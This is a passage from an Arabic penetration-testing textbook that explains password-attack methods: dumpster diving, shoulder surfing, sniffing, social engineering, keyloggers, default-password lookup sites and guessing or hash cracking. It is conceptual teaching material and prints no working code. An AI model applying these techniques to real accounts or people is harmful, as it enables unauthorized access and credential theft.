‫ﺣول ﻛﻠﻣﺎت اﻟﻣرور اﻟﮭدف ﻋن طرﯾﻖ اﻟﻧظر ﻣن ﺧﻼل ﺳﻠﺔ اﻟﻣﮭﻣﻼت‪ .‬ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ‪ low-tech attack‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻵﺛﺎر‪.‬‬
‫ﻧظرا ﻻﻧﺧﻔﺎض ﻣﺳﺗوى اﻷﻣن ﻋن ھذه اﻻﯾﺎم‪ ،‬ﻓﻛﺎن ﻓﻲ اﻟواﻗﻊ ‪ Dumpster Diving‬ذات ﺷﻌﺑﯾﺔ ﻛﺑﯾرة ﻓﻲ ‪ .1980‬ﻣﺻطﻠﺢ "‬
‫‪ " Dumpster Diving‬ﯾﺷﯾر إﻟﻰ أي ﻣن اﻟﻣﻌﻠوﻣﺎت ﺳواء اﻟﻌﺎﻣﺔ او اﻟﻣﻔﯾدة اﻟﺗﻲ وﺟدت او اﺧذت ﻣن اﻟﻣﻧﺎطﻖ ﺣﯾث ﯾﺗم اﻟﺗﺧﻠص ﻣﻧﮭﺎ‪.‬‬
‫وﺗﺷﻣل ھذه اﻟﻣﻧﺎطﻖ ﺻﻔﺎﺋﺢ اﻟﻘﻣﺎﻣﺔ وﺣﺎوﯾﺎت اﻟرﺻﯾف‪ ،‬ﻣﻛﺑﺎت اﻟﻧﻔﺎﯾﺎت‪ ،‬وﻣﺎ ﺷﺎﺑﮫ ذﻟك‪ ،‬اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت‬
‫ﻣﺟﺎﻧﺎ‪ .‬ﻗد ﺗﺟد ﻣﻠﻔﺎت ﻛﻠﻣﺔ اﻟﺳر واﻷدﻟﺔ واﻟوﺛﺎﺋﻖ اﻟﺣﺳﺎﺳﺔ‪ ،‬واﻟﺗﻘﺎرﯾر‪ ،‬واﻹﯾﺻﺎﻻت‪ ،‬وأرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬أو اﻷﻗراص اﻟﺗﻲ أﻟﻘﯾت ﺑﻌﯾدا‪.‬‬
‫ﺑﺑﺳﺎطﺔ‪ ،‬ﻓﺣص اﻟﻧﻔﺎﯾﺎت اﻟﺗﻲ ﺗم إﻟﻘﺎﺋﮭﺎ ﻓﻲ اﻟﻘﻣﺎﻣﺔ ﻗد ﺗﻛون ﻣﻔﯾدة ﻟﻠﻣﮭﺎﺟﻣﯾن‪ ،‬وھﻧﺎك ﻣﻌﻠوﻣﺎت واﻓرة ﻟدﻋم ھذا اﻟﻣﻔﮭوم‪ .‬ﻣﺛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﻔﯾدة‬
‫اﻟﺗﻲ أﻟﻘﯾت ﺑدون أي ﺗﻔﻛﯾر اﻟﻰ أي ﻣن اﻷﯾدي اﻟﺗﻲ ﻗد ﯾﻧﺗﮭﻲ اﻟﯾﮭﺎ‪ .‬ھذه اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن ﻟﻠوﺻول ﻏﯾر اﻟﻣﺻرح ﺑﮫ‬
‫اﻟﻰ أﻧظﻣﺔ اﻟﻛﻣﺑﯾوﺗر اﻵﺧرﯾن‪ ،‬أو ﯾﻣﻛن اﻷﺷﯾﺎء اﻟﺗﻲ ﯾﻌﺛر ﻋﻠﯾﮭﺎ ﯾدﻓﻊ اﻟﻰ أﻧواع أﺧرى ﻣن اﻟﮭﺟﻣﺎت ﻣﺛل اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪334‬‬

‫‪ Shoulder Surfing‬ﻋﻧدھﺎ ﯾﻛون اﻟﻣﺗﺳﻠل واﻗف ﺑﺻورة ﻏﯾر واﺿﺣﺔ ‪ ،‬وﻟﻛن ﺑﺎﻟﻘرب ﻣن اﻟﻣﺳﺗﺧدم اﻟﺷرﻋﻲ ﻟﻠﻧظﺎم ‪ ،‬وﻣﺷﺎھدة ﻛﯾف ﯾﺗم‬
‫إدﺧﺎل ﻛﻠﻣﺔ اﻟﻣرور‪ .‬اﻟﻣﮭﺎﺟم ﺑﺑﺳﺎطﺔ ﯾﻧظر إﻟﻰ ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ ﺳواء ﻟﻠﻣﺳﺗﺧدم أو اﻟﺷﺎﺷﺔ ﺑﯾﻧﻣﺎ ھو ﯾﺳﺟل اﻟدﺧول‪ ،‬وﯾراﻗب ﻟﯾرى ﻣﺎ إذا ﻛﺎن‬
‫اﻟﻣﺳﺗﺧدم ﯾﺣدق ﻓﻲ اﻟﻣﻛﺗب ﻟﯾﺗذﻛر ﻛﻠﻣﺔ اﻟﻣرور أو ﻛﻠﻣﺔ اﻟﻣرور اﻟﻔﻌﻠﯾﺔ‪ .‬ھذا ﯾﻣﻛن أن ﯾﻛون ﻣﻣﻛﻧﺎ ﻓﻘط ﻋﻧدﻣﺎ ﯾﻛون اﻟﻣﮭﺎﺟم ھو ﺟﺳدﯾﺎ ﻗرﯾب‬
‫ﻣن اﻟﮭدف‪ .‬ﯾﻣﻛن أن ﯾﺣدث ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم أﯾﺿﺎ ﻓﻲ ﻣﺣل اﻟﺑﻘﺎﻟﺔ ﻋﻧد ﺧط اﻟﺧروج ﻋﻧدﻣﺎ ﯾﻘوم اﻟﺿﺣﯾﺔ اﻟﻣﺣﺗﻣﻠﺔ ﺑﺗﻣرﯾر ﺑطﺎﻗﺔ اﻟﺳﺣب‬
‫اﻵﻟﻲ وإدﺧﺎل ‪ PIN‬اﻟﻣطﻠوﺑﺔ‪ .‬اﻟﻌدﯾد ﻣن ارﻗﺎم اﻟﮭوﯾﺔ اﻟﺷﺧﺻﯾﺔ ھذه ھﻲ ﻋﺑﺎره ﻋن أرﺑﻌﺔ ارﻗﺎم ﻓﻘط‪.‬‬
‫ﯾﺷﯾر اﻟﺗﻧﺻت )‪ (Eavesdropping‬ﻋﻠﻰ ﻓﻌل اﻻﺳﺗﻣﺎع ﺳرا ﻟﻣﺣﺎدﺛﺔ ﺷﺧص ﻣﺎ‪ .‬ﯾﻣﻛن ﺗﺣدﯾد ﻛﻠﻣﺎت اﻟﺳر ﻣن ﺧﻼل اﻻﺳﺗﻣﺎع ﺳرا ﻟﺗﺑﺎدﻻت‬
‫ﻛﻠﻣﺔ اﻟﻣرور‪ .‬إذا ﻓﺷل اﻟﮭﺎﻛر ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻋن طرﯾﻖ اﻟﺗﺧﻣﯾن‪ ،‬ﻓﮭﻧﺎك طرق أﺧرى ﯾﻣﻛﻧﮫ اﻟﻣﺣﺎوﻟﺔ ﻟﻠﺣﺻول ﻋﻠﯾﮫ‪.‬‬
‫" ‪ " Password sniffing‬ھو ﺑدﯾل ﻣﺳﺗﺧدم ﻣن ﻗﺑل اﻟﻣﺗﺳﻠﻠﯾن ﻟﻠﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺳﺗﮭدﻓﺔ‪.‬‬
‫ﻣﻌظم اﻟﺷﺑﻛﺎت ﺗﺳﺗﺧدم ﺗﻘﻧﯾﺔ اﻟﺑث )‪ ،(Broadcast technology‬ﻣﻣﺎ ﯾﻌﻧﻲ أن ﻛل رﺳﺎﻟﺔ ﯾﻘوم اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﻧﻘﻠﮭﺎ ﯾﻣﻛن ﻗراءﺗﮭﺎ‬
‫ﻣن ﻗﺑل أي ﺟﮭﺎز ﻛﻣﺑﯾوﺗر ﻣﺗﺻل ﻋﻠﻰ ﺗﻠك اﻟﺷﺑﻛﺔ‪ .‬ﻓﻲ اﻟﻣﻣﺎرﺳﺔ اﻟﻌﻣﻠﯾﺔ‪ ،‬ﻣﺎ ﻋدا ﻣﺳﺗﻠم اﻟرﺳﺎﻟﺔ‪ ،‬ﻓﺈن ﻛل أﺟﮭزة ﻛﻣﺑﯾوﺗر ﻣوﺟود ﻋﻠﻰ اﻟﺷﺑﻛﺔ‬
‫ﯾﻼﺣظ ان اﻟرﺳﺎﻟﺔ ﻏﯾر ﻣوﺟﮫ اﻟﯾﮫ‪ ،‬وﯾﺗﺟﺎھﻠﮭﺎ‪ .‬وﻣﻊ ذﻟك‪ ،‬ﻓﺄن أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﯾﻣﻛن ﺑرﻣﺟﺗﮭﺎ ﻟﻠﻧظر ﻓﻲ ﻛل رﺳﺎﻟﺔ اﻟﺗﻲ ﺗﻧﺗﻘل ﻋن طرﯾﻖ‬
‫ﻛﻣﺑﯾوﺗر ﻣﻌﯾن ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬ﺑﮭذه اﻟطرﯾﻘﺔ‪ ،‬ﯾﻣﻛن ﻟﻠﻣرء أن ﯾﻧظر إﻟﻰ اﻟرﺳﺎﺋل اﻟﺗﻲ ﻟم ﺗﻛن ﻣوﺟﮭﺔ اﻟﯾﮫ‪ .‬اﻟﻘراﺻﻧﺔ ﻟدﯾﮭم ﺑراﻣﺞ ﻟﻠﻘﯾﺎم ﺑذﻟك‪،‬‬
‫وﻣن ﺛم ﻓﺣص ﻛﺎﻓﺔ اﻟرﺳﺎﺋل اﻟﺗﻲ اﺟﺗﺎزت اﻟﺷﺑﻛﺔ ﻣن أﺟل اﻟﺑﺣث ﻋن ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﻗد ﺗﻛون ﻧﮭﺎﯾﺔ اﻟﻣطﺎف ﺑﺈﻋطﺎء ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑك‬
‫إﻟﻰ اﻟﻣﮭﺎﺟم إذا ﻛﻧت ﺗﻘوم ﺑﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ اﻟﻛﻣﺑﯾوﺗر ﻋﺑر اﻟﺷﺑﻛﺔ‪ ،‬وﻟﻘد ﺗم اﺧﺗراق ﺑﻌض أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﺑﮭذه اﻟطرﯾﻘﺔ‪.‬‬
‫ﺑﺎﺳﺗﺧدام ھذه اﻟﺗﻘﻧﯾﺔ ‪ ،password sniffing technique‬ﻓﺎن اﻟﻣﺗﺳﻠﻠﯾن ﻗد ﺟﻣﻌوا اﻵﻻف ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻋن طرﯾﻖ اﻗﺗﺣﺎم أﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺗﺻﻠﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﺧدﻣﺔ ﺑﻛﺛرة‪.‬‬

‫اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ)‪ : (Social Engineering‬ﻓﻲ اﻣن اﻟﻛوﻣﺑﯾوﺗر‪ ،‬اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ھو اﻟﻣﺻطﻠﺢ اﻟذي ﯾﻣﺛل ﻧوﻋﺎ ﻏﯾر ﺗﻘﻧﻲ ﻣن‬
‫اﻟﺗﺳﻠل‪ .‬ﻋﺎدة‪ ،‬ھذا ﯾﻌﺗﻣد ﺑﺷﻛل ﻛﺑﯾر ﻋﻠﻰ اﻟﺗﻔﺎﻋل ﺑﯾن اﻹﻧﺳﺎن وﯾﻧطوي ﻋﻠﻰ ﺧداع اﻵﺧرﯾن ﻓﻲ ﻛﺳر اﻹﺟراءات اﻷﻣﻧﯾﺔ اﻟﻣﻌﺗﺎدة ﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن‪ .‬ﯾﻌﻣل اﻟﻣﮭﻧدس اﻻﺟﺗﻣﺎﻋﻲ "ﻟﻌﺑﺔ ﺧداع" ﻟﻛﺳر اﻹﺟراءات اﻷﻣﻧﯾﺔ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬أن ﯾﻘوم اﻟﻣﮭﺎﺟم ﺑﺎﺳﺗﺧدام اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‬
‫ﻻﻗﺗﺣﺎم ﺷﺑﻛﺔ اﻟﻛﻣﺑﯾوﺗر ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﻛﺳب ﺛﻘﺔ ﺷﺧص ﻣﺧول ﻟﻠوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ‪ ،‬ﺛم ﯾﺣﺎول اﺳﺗﺧراج اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﮭدد أﻣن اﻟﺷﺑﻛﺎت‪.‬‬
‫اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ھﻲ اﻟﺗﺷﻐﯾل ﻣن ﺧﻼل ﺗدﺑﯾر اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣن ﻗﺑل اﻟﺧداع أو ‪ .swaying people‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ﺗﺣرﯾف ﻧﻔﺳﮫ ﺑﺄﻧﮫ‬
‫ﻣﺳﺗﺧدم أو ﻣﺳؤول اﻟﻧظﺎم ﻣن أﺟل اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺔ اﻟﻣرور ﻣن اﻟﻣﺳﺗﺧدم‪ .‬ﻓﻣن اﻟطﺑﯾﻌﻲ ﻟﻠﻧﺎس ان ﯾﻛوﻧوا ﻣﻔﯾدﯾن وﯾﺛﻘون‪ .‬أي ﺷﺧص‬
‫ﻋﻣوﻣﺎ ﯾﺟﻌل ﻣﺣﺎوﻟﺔ ﻟﺑﻧﺎء ﻋﻼﻗﺎت ودﯾﺔ ﻣﻊ أﺻدﻗﺎء ﻟﮫ أو اﻟزﻣﻼء‪ .‬ﻓﺎن اﻟﻣﮭﻧدﺳﯾن اﻻﺟﺗﻣﺎﻋﯾن ﯾﺳﺗﻔﺎدوا ﻣن ھذا اﻻﺗﺟﺎه‪.‬‬
‫اﻟﺳﻣﺔ أﺧرى ﻟﻠﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ ﺗﻌﺗﻣد ﻋﻠﻰ ﻋدم ﻗدرة اﻟﻧﺎس ﻋﻠﻰ ﻣواﻛﺑﺔ ھذه اﻟﺛﻘﺎﻓﺔ اﻟﺗﻲ ﺗﻌﺗﻣد ﺑﺷﻛل ﻛﺑﯾر ﻋﻠﻰ ﺗﻛﻧوﻟوﺟﯾﺎ اﻟﻣﻌﻠوﻣﺎت‪ .‬ﻣﻌظم‬
‫اﻟﻧﺎس ﻟﯾﺳوا ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن ﻗﯾﻣﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﻣﺗﻠﻛﮭﺎ وﻗﻠﯾﻼ ﻣﺎ ﯾﺗﮭﺎوﻧوا ﻓﻲ ﺣﻣﺎﯾﺗﮭﺎ‪ .‬اﻟﻣﮭﺎﺟﻣون ﯾﺳﺗﻔﺎدون ﻣن ھذه اﻟﺣﻘﯾﻘﺔ ﻟﻠﺗﺳﻠل‪ .‬ﻋﺎدة‪،‬‬
‫اﻟﻣﮭﻧدﺳﯾن اﻻﺟﺗﻣﺎﻋﯾﺔ ﯾﺑﺣﺛوا ﻓﻲ ﻣﻛﺑﺎت اﻟﻧﻔﺎﯾﺎت ﺑﺣث ﻋن ﻣﻌﻠوﻣﺎت ﻗﯾﻣﺔ‪ .‬أﻓﺿل دﻓﺎع ھو اﻟﺗﺛﻘﯾف‪ ،‬واﻟﺗدرﯾب‪ ،‬وﺧﻠﻖ اﻟوﻋﻲ‪.‬‬

‫‪ Keyboard Sniffing‬ﯾﺳﻣﺢ ﻟك ﺑﺗﻔﺳﯾر ﻛﻠﻣﺔ ﻣرور اﻟﺗﻲ ﯾدﺧﻠﮭﺎ اﻟﮭدف ﺑواﺳطﺔ ﺿﻐطﺎت اﻟﻣﻔﺎﺗﯾﺢ ﺑﺎﺳﺗﺧدام ‪.Keylogger‬‬

‫‪Default Passwords‬‬
‫اﻟﻣﺻدر‪http://securityoverride.org/default-password-list :‬‬
‫ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ھﻲ ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗوﻓرھﺎ اﻟﺷرﻛﺎت اﻟﻣﺻﻧﻌﺔ ﻣﻊ اﻟﻣﻌدات ﺟدﯾدة‪ .‬ﻋﺎدة ﻣﺎ ﺗﻛون ﻛﻠﻣﺔ اﻟﻣرور اﻻﻓﺗراﺿﯾﺔ اﻟﺗﻲ‬
‫ﺗﻘدﻣﮭﺎ اﻟﺷرﻛﺎت اﻟﻣﺻﻧﻌﺔ ﻟﻸﺟﮭزة ﻛﻠﻣﺔ اﻟﺳر اﻟﻣﺣﻣﯾﺔ ﯾﺳﻣﺢ اﻟوﺻول اﻟﻰ اﻟﺟﮭﺎز أﺛﻧﺎء اﻹﻋداد اﻷوﻟﻲ‪ .‬أدوات اﻹﻧﺗرﻧت اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ‬
‫ﻟﻠﺑﺣث ﻋن ﻛﻠﻣﺎت اﻟﺳر اﻻﻓﺗراﺿﯾﺔ ﻛﺎﻻﺗﻰ‪.‬‬
‫‪http://cirt.net‬‬
‫‪http://default-password.info‬‬
‫‪http://www.defaultpassword.us‬‬
‫‪http://www.passwordsdatabase.com‬‬
‫‪https://w3dt.net‬‬
‫‪http://www.virus.org‬‬
‫‪http://open-sez.me‬‬
‫‪http://securityoverride.org‬‬
‫‪http://www.routerpasswords.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪335‬‬

‫)‪Manual Password Cracking (Guessing‬‬


‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﯾدوﯾﺎ ﯾﺷﻣل ﻣﺣﺎوﻟﺔ ﺗﺳﺟﯾل اﻟدﺧول ﺑﺎﺳﺗﺧدام ﻛﻠﻣﺎت ﻣرور ﻣﺧﺗﻠﻔﺔ‪ .‬اﻟﺗﺧﻣﯾن ھو اﻟﻌﻧﺻر اﻷﺳﺎﺳﻲ ﻣن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬
‫)‪ .(Manual Password Cracking‬ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﻣﻔﺗﺎح اﻟﺑﯾﺎﻧﺎت اﻟذي ﯾﻛون ھﻧﺎك اﻟﺣﺎﺟﺔ اﻟﯾﮫ ﻟﻠوﺻول إﻟﻰ اﻟﻧظﺎم‪ .‬ﻣﻌظم ﻛﻠﻣﺎت اﻟﺳر‬
‫ﯾﻣﻛن ﻛﺳرھﺎ ﺑﺎﺳﺗﺧدام اﻣﺗﯾﺎزات اﻟﺗﺻﻌﯾد اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬وﺗﻧﻔﯾذ اﻟﺗطﺑﯾﻘﺎت‪ ،‬واﺧﻔﺎء اﻟﻣﻠﻔﺎت‪ ،‬وﺗﻐطﯾﺔ اﻟﻣﺳﺎرات‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣون ﺑﺎﻟﻌدﯾد ﻣن‬
‫اﻟﻣﺣﺎوﻻت ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر ﻻﻗﺗﺣﺎم اﻟﻧظﺎم اﻟﮭدف‪ .‬ﻛﻠﻣﺎت اﻟﺳر ﯾﻣﻛن ﻛﺳرھﺎ ﯾدوﯾﺎ أو ﺑﺎﺳﺗﺧدام ﺑﻌض اﻷدوات اﻵﻟﯾﺔ واﻷﺳﺎﻟﯾب‪،‬‬
‫واﻟﺧوارزﻣﯾﺎت‪ .‬ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﯾﻣﻛن ان ﯾﻛون اﻟﯾﺎ )‪ (Automated‬ﺑﺎﺳﺗﺧدام ‪ .simple FOR loop‬أﯾﺿﺎ ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﯾدوﯾﺎ‬
‫وﯾﺷﻣل ﻣﺣﺎوﻻت ﻣﺧﺗﻠﻔﺔ ﻟﺗﺳﺟﯾل اﻟدﺧول ﻛﻣﺎ ﻓﻲ اﻟطرق اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬اﻟﻌﺛور ﻋﻠﻰ ﻣﺳﺗﺧدم ﺻﺎﻟﺢ‪.‬‬
‫‪ -‬إﻧﺷﺎء ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﻣﻛﻧﺔ‪.‬‬
‫‪ -‬ﺗرﺗﯾب ﻛﻠﻣﺎت اﻟﺳر ﻣن اﺣﺗﻣﺎﻟﯾﮫ ﻣرﺗﻔﻌﺔ اﻟﻰ ﻣﻧﺧﻔﺿﮫ‪.‬‬
‫‪ -‬ﻣﻔﺗﺎح ﻓﻲ ﻛل ﻛﻠﻣﺔ ﻣرور‪ ،‬ﺣﺗﻰ ان ﺗم اﻛﺗﺷﺎف ﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﺔ‬
‫اﻟﻘراﺻﻧﺔ ﯾﻣﻛﻧﮭم أﯾﺿﺎ إﻧﺷﺎء ﻣﻠف ﺳﻛرﯾﺑت وظﯾﻔﺗﮫ ﻣﺣﺎوﻟﺔ اﺳﺗﺧدام ﻛل ﻛﻠﻣﺔ ﻓﻲ اﻟﻘﺎﺋﻣﺔ‪ .‬وﻟﻛن ﻻ ﯾزال ھذا ﻧوع ﻣن أﻧواع ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‬
‫ﯾدوﯾﺎ‪ .‬ﻣﻌدل ﻓﺷل ھذا اﻟﻧوع ﻣن اﻟﮭﺟوم ﻋﺎﻟﻲ‪.‬‬
‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ﯾدوﯾﺎ )‪(Manual‬ﻋن طرﯾﻖ اﻟﺗﺧﻣﯾن ﯾﻣﻛﻧﮫ ان ﯾﺻﺑﺢ ‪ Automated‬ﺑﺎﺳﺗﺧدام ﺑﺳﯾط ﻟﻠﺣﻠﻘﺔ)‪ . (For loop‬ﻓﻲ اﻟﻣﺛﺎل‬
‫اﻟﺗﺎﻟﻲ‪ ،‬اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ﻧﺻﻲ ﻣﻊ أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور اﻟﺗﻲ ﯾﺗم ﺗﻛرارھﺎ ﺑﺎﺳﺗﺧدام ‪.FOR loop‬‬

‫ﺣﻠﻘﺔ ‪ For loop‬اﻟرﺋﯾﺳﯾﺔ ﯾﻣﻛﻧﮭﺎ اﺳﺗﺧراج أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﺳر ﻣن ﻣﻠف اﻟﻧص اﻟﺗﻲ ھﻲ ﺑﻣﺛﺎﺑﺔ اﻟﻘﺎﻣوس ﻷﻧﮭﺎ ﺗﺗﻛرر ﻣن ﺧﻼل‬
‫ﻛل ﺳطر‪:‬‬

‫ﯾﺣﺗوي اﻟﻣﻠف ‪ outfile.txt‬ﻋﻠﻰ اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور اﻟﺻﺣﯾﺣﯾن‪ .‬إذا ﻛﺎن اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور ﻓﻲ اﻟﻣﻠف‬
‫‪ credentials.txt‬ﺻﺣﯾﺣﺔ‪ .‬إذا ﻓﺎﻧﮫ ﯾﻣﻛن ﺗﺄﺳﯾس ﺟﻠﺳﺔ ﻣﻔﺗوﺣﺔ ﻣﻊ ﺧﺎدم اﻟﺿﺣﯾﺔ ﺑﺎﺳﺗﺧدام ﻧظﺎم اﻟﻣﮭﺎﺟم‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪336‬‬

‫‪Automatic Password Cracking‬‬

‫ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور ھو ﺑﺎﻟﺗﺄﻛﯾد وﺳﯾﻠﺔ ﻣﻔﯾدة ﻟﺗﺻﻌﯾد اﻻﻣﺗﯾﺎزات وﯾﺳﻣﺢ ﻟﻧﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﺣﻘوق إدارﯾﺔ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف ﻓﻲ ﻛﺛﯾر ﻣن‬
‫اﻷﺣﯾﺎن‪ .‬ﺳﺑب آﺧر ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر وﺗﺻﺎﻋد اﻻﻣﺗﯾﺎزات ھو أن اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻧﺣو اﺧﺗﺑﺎر اﻻﺧﺗراق ﺗﺗطﻠب اﻟوﺻول‬
‫اﻟﻰ ﻣﺳﺗوى اﻹدارة ﻣن أﺟل اﻟﺗﺛﺑﯾت واﻟﺗﻧﻔﯾذ ﺑﺷﻛل ﺻﺣﯾﺢ‪.‬‬

‫إذا ﻛﻧت ﻧﺳﺗطﯾﻊ اﻟوﺻول إﻟﻰ ھﺎش ﻛﻠﻣﺔ اﻟﻣرور ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف‪ ،‬ﻓﺎن ھﻧﺎك اﺣﺗﻣﺎﻻت ﺟﯾدة ﻣﻊ ﻣﺎ ﯾﻛﻔﻲ ﻣن اﻟوﻗت‪ ،‬ﻓﯾﻣﻛﻧك ﻛﺳر ﻛﻠﻣﺔ‬
‫اﻟﺳر‪ ،‬ﺣﯾث ﯾﻣﻛن اﻛﺗﺷﺎف اﻟﻧﺳﺧﺔ اﻟﻐﯾر ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ھﺎش ﻛﻠﻣﺔ اﻟﻣرور )‪ (Password hash‬ھﻲ ﻧﺳﺧﮫ ﻣﺷﻔرة ﻣن ﻛﻠﻣﺔ‬
‫اﻟﻣرور اﻟﻌﺎدﯾﺔ‪ .‬اﻟﮭﺎش ھﻲ ﻋﺎدة ﻣﺎ ﺗﻛون أﻛﺛر ﻣن ﻣﺟرد إﻋﺎدة ﺗرﺗﯾب ﻛﻠﻣﺔ اﻟﻣرور اﻷﺻﻠﯾﺔ‪ .‬وھﻲ ﻋﺎدة ﻣﺎ ﺗﻛون ھﺎش ﻓﻲ اﺗﺟﺎه واﺣد‪.‬‬
‫اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد ھو ﺳﻠﺳﻠﺔ ﻣن اﻷﺣرف اﻟﺗﻲ ﻻ ﯾﻣﻛن ﻋﻛﺳﮭﺎ إﻟﻰ ﻧص أﺻﻠﻲ‪.‬‬
‫وﻣﻊ ذﻟك‪ ،‬ﻻ ﺗﻧﺷﺄ ﻧﻘﺎط ﺿﻌف ﻣن ﻋﻣﻠﯾﺔ اﻟﮭﺎش ﻧﻔﺳﮭﺎ‪ ،‬وﻟﻛن ﻣن ﺗﺧزﯾن ﻛﻠﻣﺔ اﻟﻣرور‪ .‬ﻻ ﯾﺗم ﻓك ﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧزﯾﻧﮭﺎ ﻓﻲ وﻗت‬
‫اﻟﻣﺻﺎدﻗﺔ ﻣن ﻗﺑل ﻣﻌظم اﻷﻧظﻣﺔ‪ .‬ھذه اﻟﻧظم ﺗﺧزن ﻓﻘط اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد‪.‬‬

‫أﺛﻧﺎء ﻋﻣﻠﯾﺔ ﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺣﻠﯾﺔ‪ ،‬ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﯾﺗم إدﺧﺎﻟﮭﺎ ﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ ﻣن ﺧﻼل ﺧوارزﻣﯾﺔ ﺗوﻟﯾد اﻟﮭﺎش ﻓﻲ اﺗﺟﺎه واﺣد وﻣﻘﺎرﻧﺗﮭﺎ‬
